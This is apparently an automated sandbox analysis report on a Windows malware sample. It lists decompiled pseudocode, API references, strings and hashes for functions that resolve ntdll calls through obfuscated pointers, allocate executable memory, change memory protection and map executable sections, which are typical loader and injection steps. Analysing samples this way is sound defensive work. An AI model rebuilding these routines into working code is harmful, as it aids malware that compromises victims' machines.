LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 002DE0CB
LdrGetProcedureAddress.NTDLL(?,00000000,?,?), ref: 002DE15D
NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 002DE1E1
NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 002DE24B

Strings

z, xrefs: 002DE18D

Memory Dump Source

Source File: 00000001.00000002.3011396965.00000000002DE000.00000040.sdmp, Offset: 002DE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: MemoryProtectVirtual$AddressLoadProcedure
String ID: z
API String ID: 3767977176-1657960367
Opcode ID: 0fd71ba999ddeba2e9d57e53e1ccce72047333cbf3351a94ae91052ddcbd577b
Instruction ID: 580c3e7fc1512a8d96f8185e69a7608b69984ce2defe94ea508d9008fad03396
Opcode Fuzzy Hash: 0fd71ba999ddeba2e9d57e53e1ccce72047333cbf3351a94ae91052ddcbd577b
Instruction Fuzzy Hash: E9819E71A102069FCF10DF99C880AAEBBBAFF85304F25855ED816AB311D770ED55CB60

Function 004027FD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

C-Code - Quality: 75%

			E004027FD() {
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t5;
				signed int _t7;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t9;
				signed int _t10;
				signed int _t12;

				_t3 = GetModuleHandleA("NTDLL.DLL"); // executed
				 *0x4054c4 = _t3;
				if(_t3 == 0) {
					_push(0x7e);
					goto L9;
				} else {
					_t5 = GetModuleHandleA("KERNEL32.DLL"); // executed
					 *0x4054c8 = _t5;
					_t10 = 0;
					while(1) {
						_t7 =  *(_t10 + 0x40501c) ^  *0x405498;
						_t9 =  *0x4054c4; // 0x76ea0000
						_push(_t7);
						_t12 = 0;
						_push(0);
						_push(_t9);
						_t8 = _t9;
						"j,h@A@"();
						if(_t7 != 0) {
							_t12 =  *_t7 + _t8;
						}
						 *(_t10 + 0x40501c) = _t12;
						if(_t12 == 0) {
							break;
						}
						_t10 = _t10 + 4;
						if(_t10 < 0x14) {
							continue;
						} else {
						}
						goto L10;
					}
					_push(0x7f);
					L9:
					_pop(0);
				}
				L10:
				return 0;
			}

0x0040280e
0x00402812
0x00402817
0x00402865
0x00000000
0x00402819
0x0040281e
0x00402820
0x00402825
0x00402827
0x0040282d
0x00402833
0x00402839
0x0040283a
0x0040283c
0x0040283d
0x0040283e
0x00402840
0x00402847
0x0040284b
0x0040284b
0x0040284f
0x00402855
0x00000000
0x00000000
0x00402857
0x0040285d
0x00000000
0x00000000
0x0040285f
0x00000000
0x0040285d
0x00402861
0x00402867
0x00402867
0x00402867
0x0040286a
0x0040286e

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,767F1218,00000000,?,?,00401187,?,00000000), ref: 0040280E
GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,00401187,?,00000000), ref: 0040281E

Part of subcall function 004029CC: lstrcmpA.KERNEL32(?,?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402A9A
Part of subcall function 004029CC: lstrlenA.KERNEL32(?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402AA5

Strings

NTDLL.DLL, xrefs: 00402807
KERNEL32.DLL, xrefs: 00402819

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: HandleModule$lstrcmplstrlen
String ID: KERNEL32.DLL$NTDLL.DLL
API String ID: 3333737328-633099880
Opcode ID: 626c4ea812b87f681040992c6ffeb7618aaff7bf83ffbf9cd8f0adcd52b6210f
Instruction ID: ad8793dc4379c6a206a675618d59d5c7fca54d7f1d1dcd28c91ada80bdc53ab0
Opcode Fuzzy Hash: 626c4ea812b87f681040992c6ffeb7618aaff7bf83ffbf9cd8f0adcd52b6210f
Instruction Fuzzy Hash: FEF0F973B5171097D620EB6A9F0CA277B98E7897127024377E40DB72D0C6B59C408AEC

Function 0025052B, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 163memory

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00250620
VirtualAlloc.KERNELBASE(00000000,0000078E,00003000,00000040), ref: 00250E91

Strings

VirtualAlloc, xrefs: 002505D0, 002505D6
$%^&, xrefs: 0025054E

Memory Dump Source

Source File: 00000001.00000002.3011253056.0000000000250000.00000040.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AllocVirtual
String ID: $%^&$VirtualAlloc
API String ID: 4275171209-2930927500
Opcode ID: a97786759e54dfb22ed3f7dda0be957b5147da7297c0018401eaeb001c559ff2
Instruction ID: 5cf576225ab8e49003c86a20380fa9c39cef70ef3ca8e34f9326dcbe7f90f9d6
Opcode Fuzzy Hash: a97786759e54dfb22ed3f7dda0be957b5147da7297c0018401eaeb001c559ff2
Instruction Fuzzy Hash: 64510930E14299CFDF11DB68CCD47EEBBF5AF59302F184098D985AB342C6B559288F29

Function 004022EC, Relevance: 6.1, APIs: 4, Instructions: 92

C-Code - Quality: 77%

			E004022EC(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr* __esi) {
				long _v8;
				char _v12;
				intOrPtr _v544;
				intOrPtr _v552;
				void _v724;
				char _v728;
				long _t39;
				long _t47;
				intOrPtr _t54;
				void* _t55;
				intOrPtr* _t57;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				void* _t66;

				_t62 = __esi;
				_t59 = __edx;
				_t55 = __ecx;
				_t60 = __eax;
				_v728 = 0;
				memset( &_v724, 0, 0x2c8);
				_t66 =  *((intOrPtr*)(_t60 + 8)) -  *0x405478; // 0x950
				if(_t66 == 0) {
					_push( *((intOrPtr*)(__esi + 0x10)));
					if( *((intOrPtr*)(__esi + 8))() == 0) {
						goto L13;
					} else {
						_v8 = 0;
						goto L12;
					}
				} else {
					_v728 = 0x10003;
					_t54 = E004027AD(_t55,  *_t60);
					if(_t54 == 0) {
						L13:
						_v8 = GetLastError();
					} else {
						_t39 = E00402749( *((intOrPtr*)(_t60 + 4)),  &_v728);
						_v8 = _t39;
						if(_t39 != 0) {
							L12:
							if(_v8 == 0xffffffff) {
								goto L13;
							}
						} else {
							 *(__esi + 4) =  *(__esi + 4) & 0x00000000;
							 *__esi = _v544;
							_t11 = _t54 + 0x218; // 0x218
							_v544 = _t11;
							_t13 = _t62 + 0x218; // 0x218
							_v552 = _t54;
							memcpy(_t13, E00402E72, 0x100);
							_t16 = _t62 + 0x18; // 0x18
							asm("cdq");
							if( *((intOrPtr*)(__esi + 0x10)) == _t16 &&  *((intOrPtr*)(__esi + 0x14)) == _t59) {
								asm("adc ecx, ecx");
								 *((intOrPtr*)(__esi + 0x10)) = _t54 + 0x18;
								 *((intOrPtr*)(__esi + 0x14)) = 0;
							}
							if(E0040276A( *_t60, _t54, _t62,  &_v12) != 0) {
								_t57 =  *0x405020;
								_t61 =  *((intOrPtr*)(_t60 + 4));
								_t47 = 0x7f;
								if(_t57 != 0) {
									_t47 = RtlNtStatusToDosError( *_t57(_t61,  &_v728));
								}
								_v8 = _t47;
								goto L12;
							}
						}
					}
				}
				return _v8;
			}

0x004022ec
0x004022ec
0x004022ec
0x004022fe
0x00402308
0x0040230e
0x00402319
0x0040231f
0x004023e9
0x004023f1
0x00000000
0x004023f3
0x004023f3
0x00000000
0x004023f3
0x00402325
0x00402327
0x00402336
0x0040233a
0x004023fc
0x00402402
0x00402340
0x0040234a
0x00402351
0x00402354
0x004023f6
0x004023fa
0x00000000
0x00000000
0x0040235a
0x00402360
0x00402364
0x00402366
0x00402371
0x00402377
0x00402383
0x00402389
0x00402391
0x00402394
0x0040239a
0x004023aa
0x004023ac
0x004023af
0x004023af
0x004023c1
0x004023c3
0x004023cb
0x004023d0
0x004023d1
0x004023de
0x004023de
0x004023e4
0x00000000
0x004023e4
0x004023c1
0x00402354
0x0040233a
0x0040240b

APIs

memset.NTDLL ref: 0040230E
GetLastError.KERNEL32(?,00000318,00000008), ref: 004023FC

Part of subcall function 004027AD: RtlNtStatusToDosError.NTDLL ref: 004027E5
Part of subcall function 004027AD: SetLastError.KERNEL32(00000000,?,?,?,00402336), ref: 004027EC

Part of subcall function 00402749: RtlNtStatusToDosError.NTDLL ref: 00402761

memcpy.NTDLL(00000218,00402E72,00000100,?,00010003,?,?,00000318,00000008), ref: 00402389

Part of subcall function 0040276A: RtlNtStatusToDosError.NTDLL ref: 0040279A
Part of subcall function 0040276A: SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004027A1

RtlNtStatusToDosError.NTDLL ref: 004023DE

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Error$Status$Last$memcpymemset
String ID:
API String ID: 945571674-0
Opcode ID: 46aab8090885b1306568bc0e3a50fcd583e001d471627f99c5e4f67a0e146dd5
Instruction ID: 3fae51a11c54e36db90388124414a18734d07815fba89533a23882a26d2618ce
Opcode Fuzzy Hash: 46aab8090885b1306568bc0e3a50fcd583e001d471627f99c5e4f67a0e146dd5
Instruction Fuzzy Hash: 29314D71900209AFDB20DF64DE89AABB7B8FB14304F10457AEA55F32D0D7B8AE449B54

Function 0040192F, Relevance: 6.1, APIs: 4, Instructions: 79
native

C-Code - Quality: 50%

			E0040192F(intOrPtr _a4, void** _a8, void* _a12) {
				int _v12;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				long _v36;
				int _v40;
				int _v44;
				void* _v48;
				long _t29;
				long _t33;
				long _t37;
				intOrPtr* _t41;
				long _t45;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t41 = _a12;
				asm("stosd");
				_v24 = _a4;
				_t29 = 0x40;
				_v36 = _t29;
				_a12 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t33 = NtCreateSection( &_a12, 0xf001f,  &_v48,  &_v24, _t29, 0x8000000, 0); // executed
				if(_t33 < 0) {
					_t45 = RtlNtStatusToDosError(_t33);
				} else {
					_t37 = E004018F0(_a12, 0xffffffff,  &_v12); // executed
					_t45 = _t37;
					if(_t45 == 0) {
						memset(_v12, 0, _v24);
						 *_a8 = _v12;
						if(_t41 != 0) {
							 *_t41 = _a12;
						}
					}
				}
				if(_a12 != 0 && _t41 == 0) {
					__imp__ZwClose(_a12);
				}
				return _t45;
			}

0x0040193d
0x0040193e
0x0040193f
0x00401940
0x00401941
0x00401942
0x0040194e
0x00401952
0x00401955
0x0040195d
0x00401971
0x00401974
0x00401977
0x0040197e
0x00401981
0x00401984
0x00401987
0x0040198a
0x00401992
0x004019d1
0x00401994
0x0040199d
0x004019a2
0x004019a6
0x004019af
0x004019bf
0x004019c1
0x004019c6
0x004019c6
0x004019c1
0x004019a6
0x004019d6
0x004019df
0x004019df
0x004019eb

APIs

NtCreateSection.NTDLL ref: 0040198A
memset.NTDLL ref: 004019AF
RtlNtStatusToDosError.NTDLL ref: 004019CB
ZwClose.NTDLL(?), ref: 004019DF

Part of subcall function 004018F0: NtMapViewOfSection.NTDLL ref: 0040191D
Part of subcall function 004018F0: RtlNtStatusToDosError.NTDLL ref: 00401924

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ErrorSectionStatus$CloseCreateViewmemset
String ID:
API String ID: 783833395-0
Opcode ID: 3470e663a032d0fb28d1b07b2d0cc5175860c4adeb9457b3b6a1b023d2b0b21c
Instruction ID: b3f3f0f65fb182f986cc8b1f5d3f5f7cdff5de093414296d106791a2da9f84a1
Opcode Fuzzy Hash: 3470e663a032d0fb28d1b07b2d0cc5175860c4adeb9457b3b6a1b023d2b0b21c
Instruction Fuzzy Hash: 022119B1910219AFCB01DF99CC459EFBBB9FB48750F100526FA11F3290D7749A14CBA5

Function 0040270C, Relevance: 4.5, APIs: 3, Instructions: 23

C-Code - Quality: 58%

			E0040270C(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x00402710
0x00402721
0x00402729
0x0040272b
0x0040273e
0x0040273e
0x00402748

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178), ref: 00402721
GetSystemDefaultUILanguage.KERNEL32(?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178,?,00000000), ref: 0040272B
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178), ref: 0040273E

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 79bb996a1244ea49f035fa6c35332c3dbe9be2932c968e9445b8b55f278922c5
Instruction ID: a10d21f4cbecd40ab08141ec1fba7a2319f1a9bb39c31be18bf90b3c037b49a9
Opcode Fuzzy Hash: 79bb996a1244ea49f035fa6c35332c3dbe9be2932c968e9445b8b55f278922c5
Instruction Fuzzy Hash: 78E0B8A4640205B6E700D7919D0AF79726CA75074AF504155FB41F70D0D7B49E05A669

Function 002D1C3C, Relevance: 3.0, APIs: 2, Instructions: 48memorytime

APIs

Part of subcall function 002D43CF: lstrlen.KERNEL32(?,00000000,?,00000000,002D1C4F,?,00000000,?,00000000,?,?,002D1DB8), ref: 002D43D8
Part of subcall function 002D43CF: mbstowcs.NTDLL ref: 002D43FF
Part of subcall function 002D43CF: memset.NTDLL ref: 002D4411

GetSystemTimeAsFileTime.KERNEL32(?,002D1DB8,00000000,?,00000000,?,00000000,?,?,002D1DB8), ref: 002D1C72

Part of subcall function 002D26CC: SafeArrayCreate.OLEAUT32(00000011,00000001,002DCA98), ref: 002D26F4
Part of subcall function 002D26CC: memcpy.NTDLL(?,002D1C97,00000008), ref: 002D270E
Part of subcall function 002D26CC: SafeArrayDestroy.OLEAUT32(002D1DB8), ref: 002D273A

HeapFree.KERNEL32(00000000,00000000,002D1DB8), ref: 002D1CA2

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ArraySafeTime$CreateDestroyFileFreeHeapSystemlstrlenmbstowcsmemcpymemset
String ID:
API String ID: 214104239-0
Opcode ID: f6947ae6ec23b489af8bde9a562181f19e5a8db486050d26a59ebad35c1aaedb
Instruction ID: 5171cd1b5e1a57782009cf5efdf183ed99867567235871ae786e6992490580e4
Opcode Fuzzy Hash: f6947ae6ec23b489af8bde9a562181f19e5a8db486050d26a59ebad35c1aaedb
Instruction Fuzzy Hash: A101A732A7020ABBDB216F659C49F5A7BACFB84704F504427FA00962A1EA71DD388751

Function 004018F0, Relevance: 3.0, APIs: 2, Instructions: 28
native

C-Code - Quality: 75%

			E004018F0(void* _a4, void* _a8, PVOID* _a12) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t12;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t12 = NtMapViewOfSection(_a4, _a8, _a12, 0, 0,  &_v16,  &_v8, 2, 0, 0x40); // executed
				return RtlNtStatusToDosError(_t12);
			}

0x00401900
0x00401906
0x00401914
0x0040191d
0x0040192c

APIs

NtMapViewOfSection.NTDLL ref: 0040191D
RtlNtStatusToDosError.NTDLL ref: 00401924

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ErrorSectionStatusView
String ID:
API String ID: 1313840181-0
Opcode ID: c0b0cca16c72e3f69227371f17784503288c00ddcddb9ee3d3bdbe3c26c3f45e
Instruction ID: d64c79457ae150eb0a106f5442764b7f5bf4f8051d33ed88b86ad0a50613e610
Opcode Fuzzy Hash: c0b0cca16c72e3f69227371f17784503288c00ddcddb9ee3d3bdbe3c26c3f45e
Instruction Fuzzy Hash: 44E0C0B6910208FFDB059F94DD0ADDF7B7DEB44300F00856AB715A6150E6B0AA189B64

Function 004026F0, Relevance: 2.6, Strings: 2, Instructions: 129

C-Code - Quality: 100%

			E004026F0(intOrPtr _a4) {
				char _v5;
				signed char _v6;
				char _v7;
				signed int _v16;
				signed short _v20;
				char _v21;
				intOrPtr _v28;
				signed short _v32;
				intOrPtr _v40;
				short _v52;
				short _v56;
				intOrPtr _v64;
				signed int _v73;
				intOrPtr _v80;
				signed int _v84;
				short _v92;
				short _v96;
				short _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				signed int _v117;
				intOrPtr _v124;
				signed int _v125;
				signed int _v140;
				char _v141;
				signed int _v152;
				intOrPtr _v156;
				short _v160;
				intOrPtr _v164;
				signed int _v168;
				intOrPtr _v172;
				signed short _v180;
				char _v181;
				signed int _v188;
				char _v189;
				intOrPtr _v196;
				short _v212;
				intOrPtr _v220;
				void* _v224;
				char _v225;
				signed int _v236;
				intOrPtr _v240;
				signed int _v244;
				char _t86;
				intOrPtr _t87;
				signed int _t93;
				intOrPtr _t104;
				intOrPtr _t119;
				intOrPtr _t135;
				intOrPtr _t139;

				_v181 = 0x10;
				_v196 = 0xd;
				_v104 = 9;
				_v100 = 8;
				_v7 = 0x24;
				_v96 = 0x1e;
				_v56 = 8;
				_v160 = 0x1c;
				_v28 = 0x1b;
				_v21 = 0x10;
				if((_v125 & 0x000000ff) == (_v73 & 0x000000ff)) {
					_t135 =  *0x43605c; // 0x18f052
					_v160 = _t135 + _v40 +  *0x42d02c + (_v20 & 0x0000ffff);
					_t119 =  *0x42d038; // 0x18f08b
					_t139 =  *0x42c00c; // 0xffffd2e0
					_t17 = _t119 + 0x4f; // 0xffffd32f
					_v189 = _t139 + _t17 +  *0x42d02c +  *0x42d024;
				}
				_t104 =  *0x42d024; // 0x18f01f
				_v212 = _t104 + 0x6e;
				_v52 = 0x7d98;
				 *0x436054 = 0xa -  *0x436058;
				_v244 = _v84;
				if(_v244 > 3) {
					_t86 = (_v125 & 0x000000ff) - (_v117 & 0x000000ff) - 0x23;
					_v5 = _t86;
				} else {
					switch( *((intOrPtr*)(_v244 * 4 +  &M00402940))) {
						case 0:
							if( *0x436048 >= 0x61) {
								_v180 = _v156 + _v168 & _v140 ^ _v236;
								_v152 = (_v180 & 0x0000ffff) - _v172 & _v188;
							}
							goto L13;
						case 1:
							__eflags = _v172 -  *0x42d020; // 0x0
							if(__eflags < 0) {
								_v225 = __dl;
								__ecx = _v64;
								__ecx = _v64 + 0xc;
								__eflags = __ecx;
								_v196 = __ecx;
							}
							goto L13;
						case 2:
							__ecx =  *0x42c014; // 0x536cedcb
							 *0x42c014 = __ecx;
							goto L13;
						case 3:
							 *0x42c010 = _v117 & 0x000000ff ^ _v16;
							goto L13;
					}
				}
				L13:
				_v156 = _v124 - _v240;
				_t87 =  *0x436048; // 0x0
				_v80 = _t87 + _v108;
				_v236 = 0x60;
				_v56 = _v164 - 0x00000058 | 0x00000037;
				E004021D0(_a4); // executed
				_t62 = _v104 - 0x18; // -14
				_v92 = 0xa - (_v73 & 0x000000ff) + _t62;
				if( *0x42d034 > 0x3e) {
					_v117 = _v164 + (_v6 & 0x000000ff) + 0x4e - _v16;
					_v5 = (_v32 & 0x0000ffff) - _v188 + _v84 + _v80 + _v104;
				}
				_v141 = 0xfffffff6 - _v112 + _v168 + _v220;
				_t93 = _v108 ^  *0x42c008;
				_v168 = _t93;
				return _t93;
			}

0x004026f9
0x00402700
0x0040270a
0x00402711
0x00402717
0x0040271b
0x00402721
0x00402727
0x00402730
0x00402737
0x00402745
0x00402747
0x0040275c
0x00402763
0x00402769
0x0040276f
0x0040277f
0x0040277f
0x00402785
0x0040278e
0x00402795
0x004027a6
0x004027af
0x004027bc
0x00402883
0x00402886
0x004027c2
0x004027c8
0x00000000
0x004027d6
0x004027f0
0x0040280a
0x0040280a
0x00000000
0x00000000
0x00402818
0x0040281e
0x00402839
0x0040283f
0x00402842
0x00402842
0x00402845
0x00402845
0x00000000
0x00000000
0x0040285a
0x00402862
0x00000000
0x00000000
0x00402871
0x00000000
0x00000000
0x004027c8
0x00402889
0x00402892
0x00402898
0x004028a0
0x004028a3
0x004028b9
0x004028c1
0x004028d7
0x004028db
0x004028e6
0x004028f9
0x0040290f
0x0040290f
0x00402926
0x0040292f
0x00402935
0x0040293e

Strings

$, xrefs: 00402717
`, xrefs: 004028A3

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID: $$`
API String ID: 0-2086647760
Opcode ID: 567217a8410f8293d50992bb43debc897487006448fc11c66888129cdc5bfe32
Instruction ID: 3bcc79275197a5fbd0f01428a3654b0b1095746b4773207dad947f1d2e88e257
Opcode Fuzzy Hash: 567217a8410f8293d50992bb43debc897487006448fc11c66888129cdc5bfe32
Instruction Fuzzy Hash: C4616B30D04269CFCB24CFA8C994BADBBB1BF45304F1482E9C44867296D7745A8ACF59

Function 002D5457, Relevance: 1.6, APIs: 1, Instructions: 72com

APIs

Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C

CoCreateInstance.OLE32(002DC028,00000000,00000004,002DC048,00000000), ref: 002D547C

Part of subcall function 002D1015: HeapFree.KERNEL32(00000000,?,002D46C4), ref: 002D1021

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$AllocateCreateFreeInstance
String ID:
API String ID: 4220887836-0
Opcode ID: b6fed966687865c95757240ca8179fb09b816ab55d86d3842d49a5f2fab1b6c3
Instruction ID: a1116b1f3554d892a9fb44a93e77f254cea5e5d82aaf4b45998fef936e0d425e
Opcode Fuzzy Hash: b6fed966687865c95757240ca8179fb09b816ab55d86d3842d49a5f2fab1b6c3
Instruction Fuzzy Hash: D4218874650615EFC710DF68C849F4A77A8EF4A742F20405AFA05DB380CBB1ED50CBA0

Function 002D4D19, Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 259
memorystringtime

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32(002DA05C,00000000,00000000), ref: 002D4D30
RtlQueryPerformanceFrequency.NTDLL(?), ref: 002D4D81
RtlQueryPerformanceCounter.NTDLL(?), ref: 002D4D8B
_aulldiv.NTDLL(?,?,?,?), ref: 002D4D9D
GetSystemTimeAsFileTime.KERNELBASE(?), ref: 002D4DB7
_aulldiv.NTDLL(?,?,00989680,00000000), ref: 002D4DD7

Part of subcall function 002D487F: RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D489B
Part of subcall function 002D487F: RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D48B9

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 002D4E54
GetTickCount.KERNELBASE ref: 002D4E65
RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D4E79
RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4E97

Part of subcall function 002D4B5A: lstrcat.KERNEL32(00000000,00000001), ref: 002D4BA3
Part of subcall function 002D4B5A: StrTrimA.SHLWAPI(00000000,002DA290), ref: 002D4BC0

StrTrimA.SHLWAPI(00000000,002DA294), ref: 002D4ECC

Part of subcall function 002D4340: lstrcpy.KERNEL32(00000000,/SetBinaryValue), ref: 002D436B
Part of subcall function 002D4340: lstrcat.KERNEL32(00000000,?), ref: 002D4376

lstrcpy.KERNEL32(?,?), ref: 002D4EEC

Part of subcall function 002D43CF: lstrlen.KERNEL32(?,00000000,?,00000000,002D1C4F,?,00000000,?,00000000,?,?,002D1DB8), ref: 002D43D8
Part of subcall function 002D43CF: mbstowcs.NTDLL ref: 002D43FF
Part of subcall function 002D43CF: memset.NTDLL ref: 002D4411

wcstombs.NTDLL ref: 002D4F96

Part of subcall function 002D584A: memcpy.NTDLL(00000000,002DA0BC,-00000001,002DA0BC,00000000,00000001,002D4FA8,00000000,00000000,002DA0BC,?,?,?), ref: 002D5902

Part of subcall function 002D1015: HeapFree.KERNEL32(00000000,?,002D46C4), ref: 002D1021

Part of subcall function 002D52D0: SysAllocString.OLEAUT32(?), ref: 002D5311
Part of subcall function 002D52D0: SysFreeString.OLEAUT32(?), ref: 002D53E5
Part of subcall function 002D52D0: SafeArrayDestroy.OLEAUT32(?), ref: 002D5439
Part of subcall function 002D52D0: SysFreeString.OLEAUT32(?), ref: 002D5447

HeapFree.KERNEL32(00000000,00000008,?), ref: 002D4FED

Part of subcall function 002D482D: RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D4836
Part of subcall function 002D482D: Sleep.KERNEL32(0000000A,?,002D1DF2,00000002,?,?), ref: 002D4840
Part of subcall function 002D482D: RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4873

Part of subcall function 002D5457: CoCreateInstance.OLE32(002DC028,00000000,00000004,002DC048,00000000), ref: 002D547C

HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002D4FFE
HeapFree.KERNEL32(00000000,?,00000001), ref: 002D500E
HeapFree.KERNEL32(00000000,?), ref: 002D501E
HeapFree.KERNEL32(00000000,00000001), ref: 002D502C

Strings

Fv, xrefs: 002D4E54
.avi, xrefs: 002D4DF1, 002D4E00, 002D4E09

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Free$Heap$CriticalSection$EnterLeaveString$CountPerformanceQueryTickTimeTrim_aulldivlstrcatlstrcpy$AllocAllocateArrayCounterCreateDestroyFileFrequencyInstanceSafeSleepSystemlstrlenmbstowcsmemcpymemsetwcstombs
String ID: .avi$Fv
API String ID: 2775928422-1418298500
Opcode ID: 0fc61762241beff132d40e6978e4ca635d34288c210af73e4bf34678889d48b1
Instruction ID: b895404018d5968ea8be4db7a484fd220dc434adae645cfdbf0de68c2e602278
Opcode Fuzzy Hash: 0fc61762241beff132d40e6978e4ca635d34288c210af73e4bf34678889d48b1
Instruction Fuzzy Hash: 2391597191121AEFCB12AFA4EC4CEAE7BB9FF48311B150026F914D7260C7759D20DBA0

Function 0040FBFF, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 109
libraryloadermemory

C-Code - Quality: 91%

			E0040FBFF(void* __ebx) {
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;
				void* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t3 = GetModuleHandleA("KERNEL32.DLL"); // executed
				_t37 = _t3;
				if(_t37 != 0) {
					_t4 = GetProcAddress(_t37, "FlsAlloc"); // executed
					 *0x436644 = _t4; // executed
					_t5 = GetProcAddress(_t37, "FlsGetValue"); // executed
					 *0x436648 = _t5; // executed
					_t6 = GetProcAddress(_t37, "FlsSetValue"); // executed
					 *0x43664c = _t6; // executed
					_t7 = GetProcAddress(_t37, "FlsFree"); // executed
					__eflags =  *0x436644;
					_t40 = TlsSetValue;
					 *0x436650 = _t7;
					if( *0x436644 == 0) {
						L6:
						 *0x436648 = TlsGetValue;
						 *0x436644 = E0040F91F;
						 *0x43664c = _t40;
						 *0x436650 = TlsFree;
					} else {
						__eflags =  *0x436648;
						if( *0x436648 == 0) {
							goto L6;
						} else {
							__eflags =  *0x43664c;
							if( *0x43664c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x42c494 = _t10;
